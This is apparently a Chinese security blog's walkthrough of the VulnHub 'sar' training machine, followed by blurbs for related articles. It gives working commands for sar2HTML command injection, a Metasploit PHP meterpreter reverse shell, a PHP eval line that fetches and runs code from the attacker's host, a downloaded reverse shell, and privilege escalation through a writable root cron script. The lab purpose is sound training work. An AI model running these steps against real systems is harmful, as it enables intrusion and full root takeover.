vulnhub之sar的实践

VSole2023-09-04 09:33:30

今天实践的是vulnhub的sar镜像,

下载地址,https://download.vulnhub.com/sar/sar.zip,

用virtualbox导入成功,

做地址扫描,sudo netdiscover -r 192.168.0.0/24,

获取到靶机地址192.168.0.186,

继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.186,

有web服务,做一下目录暴破,dirb http://192.168.0.186,

浏览器访问http://192.168.0.186/robots.txt,

浏览器访问http://192.168.0.186/sar2HTML,

搜索sar2html Ver 3.2.1的漏洞利用方法,

验证一下,http://192.168.0.186/sar2HTML/index.php?plot=;tail "/etc/passwd",

kali攻击机上构建攻击脚本,

use /exploit/multi/script/web_delivery

set target 1

set lhost 192.168.0.185

set payload php/meterpreter/reverse_tcp

exploit

浏览器访问http://192.168.0.186/sar2HTML/index.php?plot=;php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.0.185:8080/wpTl1KrB1sb', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));",

获取到shell,查看定时任务,cat /etc/crontab,

最后找到write.sh是root权限,而且当前用户可写,

kali攻击机上制作反弹shell脚本,

cp /usr/share/webshells/php/php-reverse-shell.php shell.php,

靶机上下载反弹shell脚本,

wget http://192.168.0.185:8000/shell.php,

向write.sh写入命令,echo "php ./shell.php" >> write.sh,

kali攻击机上开启反弹shell监听,nc -lvp 1234,

获取到反弹shell,id确认是root,

shellsar
本作品采用《CC 协议》,转载必须注明作者和本文链接
vulnhub之sar的实践
2023-09-04 09:33:30
今天实践的是vulnhub的sar镜像,
VulnHub靶机 | Sar
2022-07-28 10:17:28
主机发现全端口扫描Web页面信息收集扫描站点目录文件:访问robots.txt文件访问sar2HTML文件 :sar2html Ver 3.2.1漏洞发现:利用MSF :searchsploit sar2html?赋予exp可执行权限,运行exp提权成功:
vulnhub之VENGEANCE的实践
2022-06-19 12:06:05
今天实践的是vulnhub的VENGEANCE镜像, 下载地址,https://download.vulnhub.com/digitalworld/VENGEANCE.7z, 用workstation导入成功,先做端口扫描, sudo netdiscover -r 192.168.137.0/24,
该漏洞于2022年12月22日被公开披露。目前有49名专家遭黑客攻击,所幸外交安全领域的主要信息并未外泄。与自然灾害相关的索赔预计将连续第二年超过1000亿美元。该组织自2018年被发现以来,持续发起针对哥伦比亚国家的政府部门、金融、保险等行业以及大型公司的定向攻击。
靶场攻略 | vulhub_DC6
2022-11-14 10:30:50
DC-6是一个易受攻击的实验环境,最终目的是让入侵者获得root权限,并读取flag。通过tweet可以联系到作者@DCAU7。DC_6使用的操作系统为Debian 64位,可以在VirtualBox、VMware上直接运行。ssh成功进行了登录,此时登录用户为graham。发现能够以jens用户,不使用口令执行情况下执行backups.sh。打开文件backups.sh为一个文件减压的命令行,可将减压指令删除,换成/bin/bash 以jens用户去执行操作。
该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。 但有安全研究者发现JBOSSAS 6.x也受该漏洞影响,攻击者利用该漏洞无需用户验证在系统上执行任意命令,获得服务器的控制权。
干货|最全的Jboss漏洞复现笔记
但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。
推荐值得收藏 40 个命令总结,助你效率提升多倍
本文章盘点了 Linux 运维必备 150 个命令,请配合下面的网站使用。定位你需要使用的命令,然后去这个网站查询详细用法即可。 地址:wangchujiang.com/linux-command/
VSole
网络安全专家